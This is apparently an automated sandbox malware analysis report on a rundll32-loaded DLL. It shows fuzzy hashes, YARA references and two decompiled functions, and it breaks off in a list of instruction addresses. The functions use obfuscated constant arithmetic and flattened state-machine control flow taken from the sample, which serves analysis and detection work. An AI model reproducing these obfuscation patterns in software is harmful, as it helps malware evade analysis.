                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4;$5$8If$DM$JP$M|$Py$V|$d!$g4$kq:$kq:$lA$m$;
                                                                        • API String ID: 0-568511501
                                                                        • Opcode ID: ffee52309dcb3b8a3776b9ae92b59ba598ef45fc93f80cf663b5faca067fc83c
                                                                        • Instruction ID: 7d87d4b9e6001df5490aca812dbbb1cc4364f445d9f358926f4f38338a9f55e9
                                                                        • Opcode Fuzzy Hash: ffee52309dcb3b8a3776b9ae92b59ba598ef45fc93f80cf663b5faca067fc83c
                                                                        • Instruction Fuzzy Hash: 4A2200715093809FE364CF25C98AA8BFBF1FBC5708F10891DE1999A2A0D7B59949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10002628, Relevance: 16.6, Strings: 13, Instructions: 349COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E10002628(signed int __ecx, intOrPtr* __edx) {
				short* _t400;
				signed int _t408;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				short _t457;
				void* _t460;
				intOrPtr* _t464;
				void* _t466;

				 *(_t466 + 0xa4) = 0x1cb5a8;
				 *(_t466 + 0xa8) = 0x505ffa;
				_t457 = 0;
				 *(_t466 + 0xb0) = __ecx;
				 *((intOrPtr*)(_t466 + 0xbc)) = 0;
				_t464 = __edx;
				 *(_t466 + 0x30) = 0x376c;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) << 3;
				_t460 = 0xe980b9f;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0xffff79a1;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0x5a99;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) ^ 0x00018f98;
				 *(_t466 + 0x7c) = 0xd2fb;
				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) + 0xc9d;
				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) ^ 0x0000df88;
				 *(_t466 + 0x50) = 0x1f52;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) | 0x4d6b1b5a;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) >> 7;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) ^ 0x409ad63e;
				 *(_t466 + 0x64) = 0xb688;
				_t412 = 0x15;
				 *(_t466 + 0x68) =  *(_t466 + 0x64) / _t412;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7853c5;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7823fa;
				 *(_t466 + 0x14) = 0x1176;
				_t413 = 0x74;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) * 0x26;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffff909d;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffdc13;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0x000201fd;
				 *(_t466 + 0x94) = 0xba7a;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) << 0xa;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x02e990c5;
				 *(_t466 + 0x24) = 0xa3c4;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x9ff723c2;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) / _t413;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) + 0x3928;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x01616723;
				 *(_t466 + 0x1c) = 0x7213;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) | 0x351e9b59;
				_t414 = 0x5f;
				 *(_t466 + 0x18) =  *(_t466 + 0x1c) * 0x1d;
				 *(_t466 + 0x18) =  *(_t466 + 0x18) >> 3;
				 *(_t466 + 0x18) =  *(_t466 + 0x18) ^ 0x00904fb7;
				 *(_t466 + 0x5c) = 0x297a;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) | 0x66c43148;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xbef6;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0x66c4e3a8;
				 *(_t466 + 0xa8) = 0xb108;
				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) + 0xffffb23b;
				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) ^ 0x00003984;
				 *(_t466 + 0x60) = 0x972c;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) | 0x55a95463;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) << 3;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) ^ 0xad4eaf49;
				 *(_t466 + 0x38) = 0xedfb;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) / _t414;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) + 0xffffecb7;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) << 0xe;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) ^ 0xfbce5bfc;
				 *(_t466 + 0x44) = 0x5f66;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) << 8;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) * 0x4b;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) ^ 0x1bf2eb8b;
				 *(_t466 + 0x74) = 0xc9a;
				 *(_t466 + 0x74) =  *(_t466 + 0x74) + 0x2510;
				 *(_t466 + 0x74) =  *(_t466 + 0x74) ^ 0x00001e79;
				 *(_t466 + 0x58) = 0xe86a;
				_t415 = 0x5c;
				 *(_t466 + 0x5c) =  *(_t466 + 0x58) / _t415;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xffff7371;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0xffff2425;
				 *(_t466 + 0x84) = 0xcc82;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) + 0xc6d3;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x0001c52d;
				 *(_t466 + 0xb0) = 0x36af;
				_t408 = 0x79;
				 *(_t466 + 0xac) =  *(_t466 + 0xb0) / _t408;
				 *(_t466 + 0xac) =  *(_t466 + 0xac) ^ 0x00000e87;
				 *(_t466 + 0x4c) = 0x72c3;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xfe00;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xffffcf74;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) ^ 0x00017982;
				 *(_t466 + 0x88) = 0xe5b8;
				 *(_t466 + 0x88) =  *(_t466 + 0x88) + 0xffff64c8;
				 *(_t466 + 0x88) =  *(_t466 + 0x88) ^ 0x00004835;
				 *(_t466 + 0x3c) = 0xe83b;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x50645aeb;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) << 4;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) >> 0xe;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x000050c9;
				 *(_t466 + 0x34) = 0x9196;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 9;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 5;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) << 5;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) ^ 0x00007a23;
				 *(_t466 + 0x24) = 0x47d0;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x92809c60;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x0aa14077;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) >> 9;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x004c1604;
				 *(_t466 + 0x54) = 0xa739;
				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b351c6;
				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b3adaf;
				 *(_t466 + 0x6c) = 0x41b6;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) + 0x2b93;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) >> 6;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) ^ 0x000038f9;
				 *(_t466 + 0x94) = 0xf0c0;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) * 0x45;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x0040ff8e;
				 *(_t466 + 0x8c) = 0x53d0;
				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) | 0x714ab1e7;
				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) ^ 0x714af8de;
				 *(_t466 + 0x28) = 0xe7ca;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) | 0x74901d91;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) >> 2;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) << 2;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) ^ 0x7490bdaa;
				 *(_t466 + 0x84) = 0x4172;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) * 0x69;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x001ac2d4;
				 *(_t466 + 0x78) = 0xc4a2;
				 *(_t466 + 0x78) =  *(_t466 + 0x78) | 0xb1071ce6;
				 *(_t466 + 0x78) =  *(_t466 + 0x78) ^ 0xb107e3cc;
				 *(_t466 + 0x98) = 0xafb5;
				 *(_t466 + 0x98) =  *(_t466 + 0x98) >> 5;
				 *(_t466 + 0x98) =  *(_t466 + 0x98) ^ 0x000050c6;
				 *(_t466 + 0x48) = 0x5e6d;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) + 0xffff30ef;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) << 6;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) ^ 0xffe3f79c;
				 *(_t466 + 0xa4) = 0xfcdb;
				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) << 0xd;
				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) ^ 0x1f9b008b;
				 *(_t466 + 0x1c) = 0x2d62;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) >> 7;
				_t416 = 0x36;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) / _t416;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) + 0xffff17c7;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) ^ 0xffff0d36;
				 *(_t466 + 0xa0) = 0xd9f3;
				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) + 0x7ef3;
				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) ^ 0x00014615;
				 *(_t466 + 0x2c) = 0x45e6;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) | 0xb2517b85;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) + 0xffff8485;
				_t417 = 0x47;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) / _t417;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) ^ 0x028281f3;
				 *(_t466 + 0x14) = 0x40cf;
				_t418 = 0x54;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) / _t418;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) >> 0xf;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffcfbb;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0xffffd245;
				 *(_t466 + 0x70) = 0xec9;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) | 0x66abf62f;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) >> 2;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) ^ 0x19aa8e93;
				 *(_t466 + 0x9c) = 0xb92f;
				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) << 0xa;
				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) ^ 0x02e4dd06;
				 *(_t466 + 0x40) = 0xf9b7;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0xd32ba56e;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) + 0xffff6d4c;
				_t409 =  *(_t466 + 0xb0);
				 *(_t466 + 0x40) =  *(_t466 + 0x40) / _t408;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0x01bea26b;
				 *(_t466 + 0x68) = 0x7664;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) >> 0xc;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) + 0xffff8a59;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xffff9898;
				do {
					while(_t460 != 0x4166320) {
						if(_t460 == 0x5d953cf) {
							E10018668( *(_t466 + 0x68),  *(_t466 + 0x40), __eflags,  *(_t466 + 0x48), _t466 + 0x2c8);
							_t460 = 0x2c6b1ef9;
							continue;
						} else {
							if(_t460 == 0xe980b9f) {
								_t460 = 0x273bc967;
								continue;
							} else {
								if(_t460 == 0x1c525ebd) {
									_t409 = E1000492A( *(_t466 + 0x60), 0,  *((intOrPtr*)(_t466 + 0xc0)),  *((intOrPtr*)(_t466 + 0xb4)),  *(_t466 + 0x4c),  *(_t466 + 0x60),  *(_t466 + 0x6c),  *(_t466 + 0x9c),  *(_t466 + 0x60),  *((intOrPtr*)(_t466 + 0x4e8)),  *(_t466 + 0x88),  *((intOrPtr*)(_t466 + 0x80)),  *(_t466 + 0x9c),  *(_t466 + 0x48));
									_t466 = _t466 + 0x30;
									__eflags = _t395 - 0xffffffff;
									if(__eflags != 0) {
										_t460 = 0x35123284;
										continue;
									}
								} else {
									if(_t460 == 0x273bc967) {
										E10008C0C( *(_t466 + 0x70), __eflags,  *(_t466 + 0x18),  *(_t466 + 0x94), _t466 + 0xc0);
										_t400 = E10001E13( *(_t466 + 0x38),  *(_t466 + 0x30),  *(_t466 + 0x70),  *((intOrPtr*)(_t466 + 0xb8)), _t466 + 0xcc);
										_t466 = _t466 + 0x18;
										_t460 = 0x5d953cf;
										 *_t400 = 0;
										continue;
									} else {
										if(_t460 == 0x2c6b1ef9) {
											_push( *((intOrPtr*)(_t466 + 0x4d4)));
											_push( *(_t466 + 0x84));
											E100164EC( *((intOrPtr*)(_t466 + 0xbc)), __eflags, E1001BF25( *(_t466 + 0x7c),  *(_t466 + 0x60), __eflags),  *((intOrPtr*)(_t466 + 0xcc)), 0x104, _t466 + 0x2e0, _t466 + 0xd0,  *(_t466 + 0x5c),  *(_t466 + 0x94),  *(_t466 + 0x44));
											E1001C5F7( *(_t466 + 0x68),  *(_t466 + 0x58),  *(_t466 + 0x84),  *(_t466 + 0x98), _t401);
											_t466 = _t466 + 0x34;
											_t460 = 0x1c525ebd;
											continue;
										} else {
											if(_t460 != 0x35123284) {
												goto L16;
											} else {
												E10001F8B( *((intOrPtr*)(_t464 + 4)),  *((intOrPtr*)(_t466 + 0xc4)),  *(_t466 + 0x38),  *((intOrPtr*)(_t466 + 0xb8)), _t464 + 4,  *(_t466 + 0x3c),  *((intOrPtr*)(_t466 + 0x20)), _t409, _t464 + 4,  *_t464);
												_t466 = _t466 + 0x20;
												_t460 = 0x4166320;
												_t457 =  !=  ? 1 : _t457;
												continue;
											}
										}
									}
								}
							}
						}
						goto L17;
					}
					E100078F0(_t409,  *(_t466 + 0x7c),  *(_t466 + 0xa4),  *(_t466 + 0x44),  *(_t466 + 0x68));
					_t466 = _t466 + 0xc;
					_t460 = 0x2a923978;
					L16:
					__eflags = _t460 - 0x2a923978;
				} while (__eflags != 0);
				L17:
				return _t457;
			}
















                                                                        0x1000262e
                                                                        0x10002639
                                                                        0x10002648
                                                                        0x1000264a
                                                                        0x10002651
                                                                        0x10002658
                                                                        0x1000265a
                                                                        0x10002664
                                                                        0x10002669
                                                                        0x1000266e
                                                                        0x10002676
                                                                        0x1000267e
                                                                        0x10002686
                                                                        0x1000268e
                                                                        0x10002696
                                                                        0x1000269e
                                                                        0x100026a6
                                                                        0x100026ae
                                                                        0x100026b3
                                                                        0x100026bb
                                                                        0x100026c9
                                                                        0x100026ce
                                                                        0x100026d4
                                                                        0x100026dc
                                                                        0x100026e4
                                                                        0x100026f1
                                                                        0x100026f4
                                                                        0x100026f8
                                                                        0x10002700
                                                                        0x10002708
                                                                        0x10002710
                                                                        0x1000271b
                                                                        0x10002723
                                                                        0x1000272e
                                                                        0x10002736
                                                                        0x10002746
                                                                        0x1000274a
                                                                        0x10002752
                                                                        0x1000275a
                                                                        0x10002762
                                                                        0x1000276f
                                                                        0x10002770
                                                                        0x10002774
                                                                        0x10002779
                                                                        0x10002781
                                                                        0x10002789
                                                                        0x10002791
                                                                        0x10002799
                                                                        0x100027a1
                                                                        0x100027ac
                                                                        0x100027b7
                                                                        0x100027c2
                                                                        0x100027ca
                                                                        0x100027d2
                                                                        0x100027d7
                                                                        0x100027df
                                                                        0x100027ed
                                                                        0x100027f1
                                                                        0x100027f9
                                                                        0x100027fe
                                                                        0x10002806
                                                                        0x1000280e
                                                                        0x10002818
                                                                        0x1000281e
                                                                        0x10002826
                                                                        0x1000282e
                                                                        0x10002836
                                                                        0x1000283e
                                                                        0x1000284c
                                                                        0x10002851
                                                                        0x10002857
                                                                        0x1000285f
                                                                        0x10002867
                                                                        0x10002872
                                                                        0x1000287d
                                                                        0x10002888
                                                                        0x1000289a
                                                                        0x1000289d
                                                                        0x100028a4
                                                                        0x100028af
                                                                        0x100028b7
                                                                        0x100028bf
                                                                        0x100028c7
                                                                        0x100028cf
                                                                        0x100028da
                                                                        0x100028e5
                                                                        0x100028f0
                                                                        0x100028f8
                                                                        0x10002900
                                                                        0x10002905
                                                                        0x1000290a
                                                                        0x10002912
                                                                        0x1000291a
                                                                        0x1000291f
                                                                        0x10002924
                                                                        0x10002929
                                                                        0x10002931
                                                                        0x10002939
                                                                        0x10002941
                                                                        0x10002949
                                                                        0x1000294e
                                                                        0x10002956
                                                                        0x10002966
                                                                        0x1000296e
                                                                        0x10002976
                                                                        0x1000297e
                                                                        0x10002986
                                                                        0x1000298b
                                                                        0x10002993
                                                                        0x100029a6
                                                                        0x100029ad
                                                                        0x100029b8
                                                                        0x100029c3
                                                                        0x100029ce
                                                                        0x100029d9
                                                                        0x100029e1
                                                                        0x100029e9
                                                                        0x100029ee
                                                                        0x100029f3
                                                                        0x100029fb
                                                                        0x10002a0e
                                                                        0x10002a15
                                                                        0x10002a20
                                                                        0x10002a28
                                                                        0x10002a30
                                                                        0x10002a38
                                                                        0x10002a43
                                                                        0x10002a4b
                                                                        0x10002a56
                                                                        0x10002a5e
                                                                        0x10002a66
                                                                        0x10002a6b
                                                                        0x10002a75
                                                                        0x10002a80
                                                                        0x10002a88
                                                                        0x10002a93
                                                                        0x10002a9b
                                                                        0x10002aa6
                                                                        0x10002aab
                                                                        0x10002aaf
                                                                        0x10002ab7
                                                                        0x10002abf
                                                                        0x10002aca
                                                                        0x10002ad5
                                                                        0x10002ae0
                                                                        0x10002ae8
                                                                        0x10002af0
                                                                        0x10002afe
                                                                        0x10002b03
                                                                        0x10002b07
                                                                        0x10002b0f
                                                                        0x10002b1d
                                                                        0x10002b22
                                                                        0x10002b26
                                                                        0x10002b2b
                                                                        0x10002b33
                                                                        0x10002b3b
                                                                        0x10002b43
                                                                        0x10002b4b
                                                                        0x10002b50
                                                                        0x10002b58
                                                                        0x10002b63
                                                                        0x10002b6b
                                                                        0x10002b76
                                                                        0x10002b7e
                                                                        0x10002b86
                                                                        0x10002b94
                                                                        0x10002b9b
                                                                        0x10002b9f
                                                                        0x10002ba7
                                                                        0x10002baf
                                                                        0x10002bb4
                                                                        0x10002bbc
                                                                        0x10002bc4
                                                                        0x10002bc4
                                                                        0x10002bd6
                                                                        0x10002da2
                                                                        0x10002da9
                                                                        0x00000000
                                                                        0x10002bdc
                                                                        0x10002be2
                                                                        0x10002d84
                                                                        0x00000000
                                                                        0x10002be8
                                                                        0x10002bee
                                                                        0x10002d70
                                                                        0x10002d72
                                                                        0x10002d75
                                                                        0x10002d78
                                                                        0x10002d7a
                                                                        0x00000000
                                                                        0x10002d7a
                                                                        0x10002bf4
                                                                        0x10002bfa
                                                                        0x10002cef
                                                                        0x10002d0f
                                                                        0x10002d14
                                                                        0x10002d17
                                                                        0x10002d1e
                                                                        0x00000000
                                                                        0x10002c00
                                                                        0x10002c06
                                                                        0x10002c53
                                                                        0x10002c5a
                                                                        0x10002caa
                                                                        0x10002cc6
                                                                        0x10002ccb
                                                                        0x10002cce
                                                                        0x00000000
                                                                        0x10002c08
                                                                        0x10002c0e
                                                                        0x00000000
                                                                        0x10002c14
                                                                        0x10002c39
                                                                        0x10002c40
                                                                        0x10002c44
                                                                        0x10002c4b
                                                                        0x00000000
                                                                        0x10002c4b
                                                                        0x10002c0e
                                                                        0x10002c06
                                                                        0x10002bfa
                                                                        0x10002bee
                                                                        0x10002be2
                                                                        0x00000000
                                                                        0x10002bd6
                                                                        0x10002dc8
                                                                        0x10002dcd
                                                                        0x10002dd0
                                                                        0x10002dd5
                                                                        0x10002dd5
                                                                        0x10002dd5
                                                                        0x10002de1
                                                                        0x10002ded

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #z$(9$5H$b-$dv$f_$j$l7$m^$rA$z)$E$ZdP
                                                                        • API String ID: 0-500794611
                                                                        • Opcode ID: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
                                                                        • Instruction ID: 2f189fb40b88e7232357bad84871cb140e457652571658457e73c86c02e6a5c1
                                                                        • Opcode Fuzzy Hash: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
                                                                        • Instruction Fuzzy Hash: 7D021F715093819FE368CF21C98AA4FBBE1BBC4748F10891DE2D9962A0D7B58949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10009CC8, Relevance: 16.5, Strings: 13, Instructions: 243COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E10009CC8() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				intOrPtr _t232;
				void* _t233;
				intOrPtr _t236;
				void* _t246;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				intOrPtr _t277;
				signed int* _t279;
				void* _t282;

				_t279 =  &_v612;
				_v532 = 0x572357;
				_v528 = 0x2f5978;
				_t270 = 0xf;
				_t277 = 0;
				_v524 = 0;
				_t246 = 0x31c11544;
				_v612 = 0x129f;
				_v612 = _v612 / _t270;
				_v612 = _v612 ^ 0xf442200a;
				_v612 = _v612 + 0x8904;
				_v612 = _v612 ^ 0xf442aa27;
				_v608 = 0x5b59;
				_t271 = 7;
				_v608 = _v608 / _t271;
				_v608 = _v608 ^ 0x00000d25;
				_v596 = 0x2567;
				_v596 = _v596 ^ 0xfa26aa3d;
				_v596 = _v596 << 0x10;
				_t272 = 0x51;
				_v596 = _v596 / _t272;
				_v596 = _v596 ^ 0x01c566ae;
				_v564 = 0x2177;
				_v564 = _v564 ^ 0x4051fc1c;
				_v564 = _v564 ^ 0xb5034854;
				_v564 = _v564 ^ 0xf552b9fc;
				_v552 = 0xa42c;
				_v552 = _v552 + 0xffff8520;
				_t273 = 0x36;
				_v552 = _v552 / _t273;
				_v552 = _v552 ^ 0x00005687;
				_v556 = 0x4d63;
				_v556 = _v556 ^ 0x23f659e6;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x3f617f89;
				_v548 = 0xc92c;
				_t274 = 0x1f;
				_v548 = _v548 / _t274;
				_v548 = _v548 | 0xd485f233;
				_v548 = _v548 ^ 0xd4858bcc;
				_v608 = 0x4780;
				_v608 = _v608 + 0xffff036b;
				_v608 = _v608 ^ 0xffff7b62;
				_v592 = 0xf0a1;
				_v592 = _v592 ^ 0x3b3a717c;
				_v592 = _v592 ^ 0x4319cb35;
				_v592 = _v592 + 0x4f8d;
				_v592 = _v592 ^ 0x78239a46;
				_v588 = 0x33cb;
				_v588 = _v588 * 0x50;
				_v588 = _v588 | 0x5a8f737f;
				_v588 = _v588 ^ 0x5a9f48d0;
				_v536 = 0x13fd;
				_v536 = _v536 * 5;
				_v536 = _v536 ^ 0x00004fad;
				_v600 = 0x5083;
				_v600 = _v600 ^ 0xb24ff3ec;
				_v600 = _v600 + 0xffff65b9;
				_t275 = 0x35;
				_v600 = _v600 * 0x36;
				_v600 = _v600 ^ 0x9cabf209;
				_v572 = 0x63e6;
				_v572 = _v572 << 3;
				_v572 = _v572 + 0x6ca3;
				_v572 = _v572 ^ 0x0003addb;
				_v540 = 0x1289;
				_v540 = _v540 >> 1;
				_v540 = _v540 ^ 0x00003929;
				_v544 = 0x5834;
				_v544 = _v544 ^ 0x9eb824c8;
				_v544 = _v544 ^ 0x9eb8689b;
				_v584 = 0x7c37;
				_v584 = _v584 * 0x74;
				_v584 = _v584 ^ 0x66bbdc02;
				_v584 = _v584 ^ 0x6683aa43;
				_v568 = 0x4cc0;
				_v568 = _v568 | 0x439ba37f;
				_v568 = _v568 + 0xffffbc9e;
				_v568 = _v568 ^ 0x439bbd6b;
				_v560 = 0x409b;
				_v560 = _v560 + 0x5a42;
				_v560 = _v560 + 0xabe3;
				_v560 = _v560 ^ 0x000101e3;
				_v612 = 0x62bf;
				_v612 = _v612 << 9;
				_v612 = _v612 + 0xffffd5ba;
				_v612 = _v612 ^ 0xe652b9b2;
				_v612 = _v612 ^ 0xe697c132;
				_v576 = 0x7077;
				_t276 = _v608;
				_v576 = _v576 / _t275;
				_v576 = _v576 * 5;
				_v576 = _v576 ^ 0x00006027;
				_v580 = 0x9a4a;
				_v580 = _v580 + 0x4b3e;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0x396d003f;
				goto L1;
				do {
					while(1) {
						L1:
						_t282 = _t246 - 0x31c11544;
						if(_t282 > 0) {
							break;
						}
						if(_t282 == 0) {
							_push(_t246);
							_t236 = E100157E8(0x440);
							 *0x100221b0 = _t236;
							__eflags = _t236;
							if(__eflags == 0) {
								L23:
								return _t277;
							}
							 *((intOrPtr*)(_t236 + 0x21c)) = E100094EC;
							_t246 = 0x30823c81;
							continue;
						}
						if(_t246 == 0x687b4fe) {
							_v604 = 0xf298;
							_t246 = 0x37d3e938;
							_v604 = _v604 + 0xbb6f;
							_v604 = _v604 ^ 0x0001ae2e;
							continue;
						}
						if(_t246 == 0x8847984) {
							E10008C0C(_v584, __eflags, _v568, _v560,  &_v520);
							 *((intOrPtr*)( *0x100221b0 + 0xc)) = E1001C424( &_v520, _v576);
							goto L23;
						}
						if(_t246 == 0x2aee8ed5) {
							_v604 = 0xdb1c;
							_t246 = 0x3b385d06;
							_v604 = _v604 | 0xf22f27d0;
							_v604 = _v604 ^ 0xf22fffc0;
							 *((intOrPtr*)( *0x100221b0 + 0x220)) = E10017A42;
							continue;
						}
						if(_t246 != 0x30823c81) {
							goto L20;
						}
						_t276 = E1000DA66(_v580, _t267, _v552, _t246, _v556);
						_t279 =  &(_t279[3]);
						if(_t276 == 0) {
							_t246 = 0x2aee8ed5;
						} else {
							 *((intOrPtr*)( *0x100221b0 + 0x22c)) = 1;
							_t246 = 0x687b4fe;
						}
					}
					__eflags = _t246 - 0x37d3e938;
					if(_t246 == 0x37d3e938) {
						_t267 = _t276;
						E1001F23C(_v548, _t276, _v608, _v592, _v588);
						_t279 =  &(_t279[3]);
						_t246 = 0x3b385d06;
						goto L20;
					}
					__eflags = _t246 - 0x3b385d06;
					if(_t246 == 0x3b385d06) {
						_push(_t246);
						_t198 =  &_v600; // 0x6027
						_t267 = _v536;
						_t232 = E10001D54(_v536, _t246,  *_t198, _v572, _v540,  *0x100221b0 + 0x234, _v544, _v604);
						_t279 =  &(_t279[8]);
						_t246 = 0x3b59d612;
						__eflags = _t232;
						_t233 = 1;
						_t277 =  ==  ? _t233 : _t277;
						goto L1;
					}
					__eflags = _t246 - 0x3b59d612;
					if(_t246 != 0x3b59d612) {
						goto L20;
					}
					E10007605();
					_t246 = 0x8847984;
					goto L1;
					L20:
					__eflags = _t246 - 0x393fa17b;
				} while (__eflags != 0);
				goto L23;
			}









































                                                                        0x10009cc8
                                                                        0x10009cce
                                                                        0x10009cd8
                                                                        0x10009ce6
                                                                        0x10009ce7
                                                                        0x10009cee
                                                                        0x10009cf2
                                                                        0x10009cf4
                                                                        0x10009d04
                                                                        0x10009d0a
                                                                        0x10009d12
                                                                        0x10009d1a
                                                                        0x10009d22
                                                                        0x10009d2e
                                                                        0x10009d33
                                                                        0x10009d39
                                                                        0x10009d41
                                                                        0x10009d49
                                                                        0x10009d51
                                                                        0x10009d5a
                                                                        0x10009d5f
                                                                        0x10009d65
                                                                        0x10009d6d
                                                                        0x10009d75
                                                                        0x10009d7d
                                                                        0x10009d85
                                                                        0x10009d8d
                                                                        0x10009d95
